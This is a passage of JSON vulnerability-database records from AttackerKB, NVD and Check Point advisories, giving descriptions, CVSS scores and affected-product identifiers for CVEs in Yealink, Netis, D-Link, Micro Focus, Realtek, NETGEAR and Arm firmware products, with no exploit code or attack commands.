"attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-15T00:00:00", "type": "attackerkb", "title": "CVE-2021-27561", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27561"], "modified": "2021-10-22T00:00:00", "id": "AKB:F5BB1D1A-703E-4AF0-AC4F-1096F8E165AA", "href": "https://attackerkb.com/topics/lI3PQLJRoT/cve-2021-27561", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-24T15:49:53", "description": "Netis WF2419 is vulnerable to authenticated Remote Code Execution (RCE) as root through the router Web management page. The vulnerability has been found in firmware version V1.2.31805 and V2.2.36123. After one is connected to this page, it is possible to execute system commands as root through the tracert diagnostic tool because of lack of user input sanitizing.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-07T00:00:00", "type": "attackerkb", "title": "CVE-2019-19356", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19356"], "modified": "2020-06-05T00:00:00", "id": "AKB:370332F7-5750-47DA-AB2B-FA7031E09847", "href": "https://attackerkb.com/topics/1iaswkQoRp/cve-2019-19356", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-12-22T20:13:16", "description": "D-Link DNS-320 FW v2.06B01 Revision Ax is affected by command injection in the system_mgr.cgi component, which can lead to remote arbitrary code execution.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-02T00:00:00", "type": "attackerkb", "title": "CVE-2020-25506", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25506"], "modified": "2021-02-05T00:00:00", "id": "AKB:9F58CF06-BDF5-4077-ABE5-72DF3E82D56E", "href": "https://attackerkb.com/topics/96dkHg25qF/cve-2020-25506", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-25T23:12:25", "description": "Remote Code execution vulnerability in Micro Focus Operation Bridge Reporter (OBR) product, affecting version 10.40. The vulnerability could be exploited to allow Remote Code Execution on the OBR server.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-22502", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22502"], "modified": "2021-02-12T00:00:00", "id": "AKB:2C82DAAE-9BBF-44F8-B1A3-BFE303FB1B39", "href": "https://attackerkb.com/topics/lGSaEhn81Z/cve-2021-22502", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-12-26T08:11:09", "description": "The miniigd SOAP service in Realtek SDK allows remote attackers to execute arbitrary code via a crafted NewInternalClient request.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {}, "published": "2015-05-01T00:00:00", "type": "attackerkb", "title": "CVE-2014-8361", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8361"], "modified": "2020-07-30T00:00:00", "id": "AKB:4A6EA472-07F9-4F41-9994-6394FE5838B6", "href": "https://attackerkb.com/topics/se6PmhVCp1/cve-2014-8361", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-28T05:11:13", "description": "NETGEAR JGS516PE devices before 2.6.0.43 are affected by lack of access control at the function level.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-09T00:00:00", "type": "attackerkb", "title": "CVE-2020-26919", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-26919"], "modified": "2020-10-20T00:00:00", "id": "AKB:6FA0F70D-A8F0-453C-A49C-E85D1581EB2A", "href": "https://attackerkb.com/topics/wUR8ZpfpXX/cve-2020-26919", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T16:09:06", "description": "In Arm Trusted Firmware M through 1.2, the NS world may trigger a system halt, an overwrite of secure data, or the printing out of secure data when calling secure functions under the NSPE handler mode.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-25T19:15:00", "type": "cve", "title": "CVE-2021-27562", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27562"], "modified": "2021-06-08T18:25:00", "cpe": ["cpe:/o:arm:trusted_firmware_m:1.2"], "id": "CVE-2021-27562", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27562", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:arm:trusted_firmware_m:1.2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-07-07T15:07:57", "description": "Yealink Device Management (DM) 3.6.0.20 allows command injection as root via the /sm/api/v1/firewall/zone/services URI, without authentication.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-15T18:15:00", "type": "cve", "title": "CVE-2021-27561", "cwe": ["CWE-918"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27561"], "modified": "2022-06-28T14:11:00", "cpe": ["cpe:/a:yealink:device_management:3.6.0.20"], "id": "CVE-2021-27561", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27561", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:yealink:device_management:3.6.0.20:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T22:15:15", "description": "Netis WF2419 is vulnerable to authenticated Remote Code Execution (RCE) as root through the router Web management page. The vulnerability has been found in firmware version V1.2.31805 and V2.2.36123. After one is connected to this page, it is possible to execute system commands as root through the tracert diagnostic tool because of lack of user input sanitizing.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-07T23:15:00", "type": "cve", "title": "CVE-2019-19356", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19356"], "modified": "2022-01-01T19:57:00", "cpe": ["cpe:/o:netis-systems:wf2419_firmware:2.2.36123", "cpe:/o:netis-systems:wf2419_firmware:1.2.31805"], "id": "CVE-2019-19356", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-19356", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:netis-systems:wf2419_firmware:2.2.36123:*:*:*:*:*:*:*", "cpe:2.3:o:netis-systems:wf2419_firmware:1.2.31805:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:50:11", "description": "D-Link DNS-320 FW v2.06B01 Revision Ax is affected by command injection in the system_mgr.cgi component, which can lead to remote arbitrary code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-02T13:15:00", "type": "cve", "title": "CVE-2020-25506", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25506"], "modified": "2021-07-21T11:39:00", "cpe": ["cpe:/o:dlink:dns-320_firmware:2.06b01"], "id": "CVE-2020-25506", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-25506", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:dlink:dns-320_firmware:2.06b01:*:*:*:*:*:*:*"]}, {"lastseen": "2022-07-13T15:59:56", "description": "Remote Code execution vulnerability in Micro Focus Operation Bridge Reporter (OBR) product, affecting version 10.40. The vulnerability could be exploited to allow Remote Code Execution on the OBR server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-08T22:15:00", "type": "cve", "title": "CVE-2021-22502", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22502"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:microfocus:operation_bridge_reporter:10.40"], "id": "CVE-2021-22502", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-22502", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microfocus:operation_bridge_reporter:10.40:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:02:26", "description": "The miniigd SOAP service in Realtek SDK allows remote attackers to execute arbitrary code via a crafted NewInternalClient request.", "cvss3": {}, "published": "2015-05-01T15:59:00", "type": "cve", "title": "CVE-2014-8361", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8361"], "modified": "2021-04-09T07:15:00", "cpe": ["cpe:/o:d-link:dir-905l_firmware:1.02", "cpe:/o:d-link:dir-619l_firmware:1.15", "cpe:/o:d-link:dir-600l_firmware:1.15", "cpe:/o:d-link:dir-619l_firmware:2.03", "cpe:/o:d-link:dir-600l_firmware:2.05", "cpe:/o:d-link:dir-809_firmware:1.02", "cpe:/o:d-link:dir-605l_firmware:2.04", "cpe:/a:realtek:realtek_sdk:-", "cpe:/o:d-link:dir-605l_firmware:1.13"], "id": "CVE-2014-8361", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8361", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:d-link:dir-905l_firmware:1.02:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dir-619l_firmware:2.03:*:*:*:*:*:*:*", "cpe:2.3:a:realtek:realtek_sdk:-:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dir-619l_firmware:1.15:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dir-600l_firmware:1.15:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dir-600l_firmware:2.05:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dir-809_firmware:1.02:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dir-605l_firmware:1.13:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dir-605l_firmware:2.04:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T16:16:00", "description": "NETGEAR JGS516PE devices before 2.6.0.43 are affected by lack of access control at the function level.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-09T07:15:00", "type": "cve", "title": "CVE-2020-26919", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-26919"], "modified": "2020-10-19T14:23:00", "cpe": [], "id": "CVE-2020-26919", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-26919", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:32:00", "description": "A command injection vulnerability exists in Yealink Device Management. The vulnerability is due to improper handling of a crafted HTTP request.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-12-02T00:00:00", "type": "checkpoint_advisories", "title": "Yealink Device Management Command Injection (CVE-2021-27561)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27561"], "modified": "2021-12-02T00:00:00", "id": "CPAI-2021-0914", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:16:14", "description": "A remote code execution vulnerability exists in Netissystems wf2419 firmware 1.2.31805. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-09-10T00:00:00", "type": "checkpoint_advisories", "title": "Netis WF2419 Remote Code Execution (CVE-2019-19356)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19356"], "modified": "2020-09-10T00:00:00", "id": "CPAI-2019-2247", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:34:05", "description": "A command injection vulnerability exists in D-Link DNS-320. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary commands on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-18T00:00:00", "type": "checkpoint_advisories", "title": "D-Link DNS-320 Command Injection (CVE-2020-25506)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25506"], "modified": "2021-02-18T00:00:00", "id": "CPAI-2020-3260", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:33:39", "description": "A remote code execution vulnerability exists in Micro Focus Operations Bridge Reporter. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-05T00:00:00", "type": "checkpoint_advisories", "title": "Micro Focus Operations Bridge Reporter Remote Code Execution (CVE-2021-22502)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22502"], "modified": "2021-04-05T00:00:00", "id": "CPAI-2021-0158", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:40:50", "description": "A command injection vulnerability exists in Realtek SDK. The vulnerability is due to lack of input sanitization on user-supplied data when processing the NewInternalClient requests to the miniigd SOAP service. By sending a crafted SOAP request to the affected service, a remote unauthenticated attacker can exploit this vulnerability to execute code with root privileges.", "cvss3": {}, "published": "2016-09-20T00:00:00", "type": "checkpoint_advisories", "title": "Realtek SDK Miniigd AddPortMapping SOAP Action Command Injection (CVE-2014-8361)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8361"], "modified": "2016-09-21T00:00:00", "id": "CPAI-2016-0815", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-16T19:33:50", "description": "A remote code execution 